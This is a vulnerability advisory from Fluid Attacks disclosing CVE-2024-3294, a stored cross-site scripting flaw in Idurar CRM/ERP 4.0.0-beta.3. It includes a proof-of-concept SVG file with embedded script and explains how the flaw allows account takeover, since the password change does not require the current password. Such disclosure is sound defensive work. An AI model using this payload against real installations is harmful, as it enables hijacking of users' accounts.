---
slug: advisories/arroyo/
title: Idurar CRM/ERP 4.0.0-beta.3 - Stored Cross Site Scripting
authors: Carlos Bello
writer: cbello
codename: arroyo
product: Idurar CRM/ERP 4.0.0-beta.3 - Stored Cross Site Scripting
date: 2024-04-00 12:00 COT
cveid: CVE-2024-3294
severity: 8.1
description: Idurar CRM/ERP 4.0.0-beta.3 - Stored Cross Site Scripting
keywords: Fluid Attacks, Security, Vulnerabilities, File Upload, XSS, CVE
banner: advisories-bg
advise: yes
template: maskedAdvisory
encrypted: yes
---

## Summary

<summary-table
    name="Idurar CRM/ERP 4.0.0-beta.3 - Stored Cross Site Scripting"
    code="[Arroyo](https://en.wikipedia.org/wiki/Joe_Arroyo)"
    product="Idurar CRM/ERP"
    affected-versions="Version 4.0.0-beta.3"
    fixed-versions=""
    state="Private"
    release="2024-04-00">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Stored cross-site scripting (XSS)"
    rule="[010. Stored cross-site scripting (XSS)](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-010)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
    score="8.1"
    available="Yes"
    id="[CVE-2024-3294](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3294)">
</vulnerability-table>

## Description

Idurar CRM/ERP version 4.0.0-beta.3 allows an account takeover to be performed
on any user who accesses a malicious link. This is possible because the application
is vulnerable to Stored XSS.

## Vulnerability

A stored cross site scripting (Stored XSS) vulnerability has been identified in
Idurar CRM/ERP that allows an attacker to log into arbitrary user accounts in
the application with a one-click attack.

## Exploit

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by cbelloatfluid");
  </script>
</svg>
```

## Evidence of exploitation

The application allows the user to change his password. However, it does not ask
for the current password, which is why we can use the exploit to perform an account
takeover through this functionality.

<img src="https://rb.gy/b26r60" alt="Account-Takeover-Functionality"/>

<iframe src="https://rb.gy/akyc2k"
width="835" height="504" frameborder="0" title="XSS-Idurar-4.0.0-beta.3"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2024-3294 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Idurar CRM/ERP 4.0.0-beta.3

* Operating System: MacOS

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/idurar/idurar-erp-crm/>

## Timeline

<time-lapse
  discovered="2024-04-03"
  contacted="2024-04-03"
  replied=""
  confirmed=""
  patched=""
  disclosure="">
</time-lapse>
